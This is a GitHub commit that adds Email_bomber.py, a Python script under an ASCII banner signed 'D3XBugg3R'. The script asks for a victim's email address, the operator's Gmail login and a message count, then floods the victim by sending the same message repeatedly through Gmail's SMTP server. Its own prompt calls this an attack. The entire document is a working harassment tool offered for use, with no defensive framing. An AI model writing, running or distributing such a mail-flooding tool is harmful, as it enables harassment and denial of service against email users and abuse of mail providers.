Add files via upload

This commit is contained in:
Sameer Bhatt (debugger) 2017-08-04 13:11:15 +05:30 committed by GitHub
parent 598281822d
commit 513ec89ad2
1 changed files with 27 additions and 0 deletions

27
Email_bomber.py Normal file
View File

@ -0,0 +1,27 @@
import smtplib
import time
print ("\033[1;31m_________ __ __ ____ ________ __ \033[1;m")
print ("\033[1;34m|########| |##\ /##| /####\ |########| |##| By D3XBugg3R \033[1;m")
print ("\033[1;34m|##|____ |###\ __ /###| /##/\##\ |##| |##| With <3 of T34M GCA \033[1;m")
print ("\033[1;34m|########| |##| |##| |##| /########\ |##| |##| ____ __ ____ __ ___ \033[1;m")
print ("\033[1;31m|##|_____ |##| |##| /##/ \##\ __|##|__ |##|_______ |__| | | |\/| |__| |__ |__| \033[1;m")
print ("\033[1;31m|########| |##| |##| /##/ \##\ |########| |##########| _|__| |__| | | _|__| |__ | \ \033[1;m")
try:
bomb_email = input("Enter Email address on Whom you want to perfom this attack: ")
email = input("Enter your gmail_address:")
password = input("Enter your gmail_password:")
message = input("Enter Message:")
counter = int(input("How many message you want to send?:"))
for x in range(0,counter):
print("Number of Message Sent : ", x+1)
mail = smtplib.SMTP('smtp.gmail.com',587)
mail.ehlo()
mail.starttls()
mail.login(email,password)
mail.sendmail(email,bomb_email,message)
time.sleep(1)
mail.close()
except Exception as e:
print("Something is wrong, please Re-try Again with Valid input.")